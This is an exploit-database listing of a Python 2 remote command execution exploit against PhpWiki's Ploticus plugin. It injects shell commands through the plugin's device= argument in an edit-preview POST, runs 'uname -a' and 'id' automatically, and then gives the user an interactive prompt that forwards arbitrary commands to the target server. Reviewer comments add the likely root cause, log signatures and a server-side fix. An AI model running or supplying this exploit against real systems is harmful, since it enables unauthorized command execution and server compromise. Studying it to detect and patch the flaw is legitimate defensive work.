PhpWiki – Remote Command Execution

  • 作者: Benjamin Harris
    日期: 2014-08-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34451/
  • ###############################################################
    #_______ __ _ 
    # / __/_______ _____/ /_____ ___(_) /__(_)
    #/ /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
    # / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
    #/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ 
    # /_/ /_/ /_/ 
    # Diskovered in Nov/Dec 2011
    ###############################################################
    
    import urllib
    import urllib2
    import sys
    def banner():
    	"""Write the author's ASCII-art logo to stdout, followed by one blank line."""
    	# Rows are kept exactly as published; the last one carries its own "\n",
    	# which together with print's newline produces the trailing blank line.
    	logo_rows = (
    		"	_______ __ _ ",
    		"	 / __/_______ _____/ /_____ ___(_) /__(_)",
    		"	/ /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / ",
    		"	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /",
    		"	/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ ",
    		"	 /_/ /_/ /_/ \n",
    	)
    	for row in logo_rows:
    		print row
    
    
    def usage():
    	"""Show the logo and a one-line invocation example built from sys.argv[0]."""
    	banner()
    	# The example line is assembled from the script's own name plus a
    	# placeholder wiki URL.
    	example = "".join(["	[-] python ", sys.argv[0], " http://path.to/wiki"])
    	print "	[+] Usage example"
    	print example
    
    # Without a target URL on the command line, show the usage text and exit.
    if not sys.argv[1:]:
    	usage()
    	quit()
    
    # Base URL of the wiki, taken verbatim from the first argument; nothing
    # checks its scheme or form before it is concatenated into a request URL.
    domain = sys.argv[1]
    def commandexec(cmd):
    	"""Submit `cmd` through a PhpWiki edit-preview request and return its echoed output.

    	cmd: text concatenated unescaped into the Ploticus `device` argument.
    	Returns the slice of the response body between the two marker strings.
    	Reads the module-level `domain`; urllib2 errors are not caught here.
    	"""
    	# Form fields: pagename=HeIp, action=edit, edit[preview]=Preview, and an
    	# edit[content] value holding a <<Ploticus ...>> plugin call. `cmd` sits
    	# inside the quoted device= value between two echo commands that emit the
    	# markers 123::: and :::123; all three redirect stdout to stderr (1>&2).
    	# NOTE(review): this can only work if the plugin hands device= to a shell
    	# without escaping -- presumably the root cause; confirm in the plugin source.
    	# NOTE(review): edit[preview] presumably renders the content without saving
    	# a page revision, so page history may show nothing -- verify on the server.
    	# Defender view: the request is recognisable in POST bodies by "<<Ploticus"
    	# with ';' inside device=, and in access logs by POSTs to /index.php/HeIp.
    	# The fix belongs on the server side: disable the Ploticus plugin or make it
    	# validate its arguments before they reach a command line.
    	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    	# Supplying `data` makes urllib2 send a POST; no timeout is set on the call.
    	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    	cmd2 = urllib2.urlopen(cmd1)
    	output = cmd2.read()
    	# find() returns -1 when a marker is absent, so a response without the
    	# markers yields the unrelated slice output[6:-1] rather than an error.
    	firstloc = output.find("123:::\n") + len("123:::\n")
    	secondloc = output.find("\n:::123")
    	return output[firstloc:secondloc]
    
    
    # Script entry: print the logo, then send two fixed commands ('uname -a' and
    # 'id') before any prompt, so every run issues at least two POST requests.
    banner()
    print commandexec('uname -a')
    print commandexec('id')
    # NOTE(review): `quit` is still the interpreter-provided object here, so the
    # first comparison with 1 is true; the loop ends only once the name is
    # rebound to 1 below, which also shadows that object for the rest of the run.
    while(quit != 1):
    	cmd = raw_input('Run a command: ')
    	if cmd == 'quit':
    		print "[-] Hope you had fun :)"
    		quit = 1
    	if cmd != 'quit':
    		# Any other input line is forwarded unchanged, one HTTP request per
    		# line, so a session shows up server-side as a run of POSTs to one page.
    		print commandexec(cmd)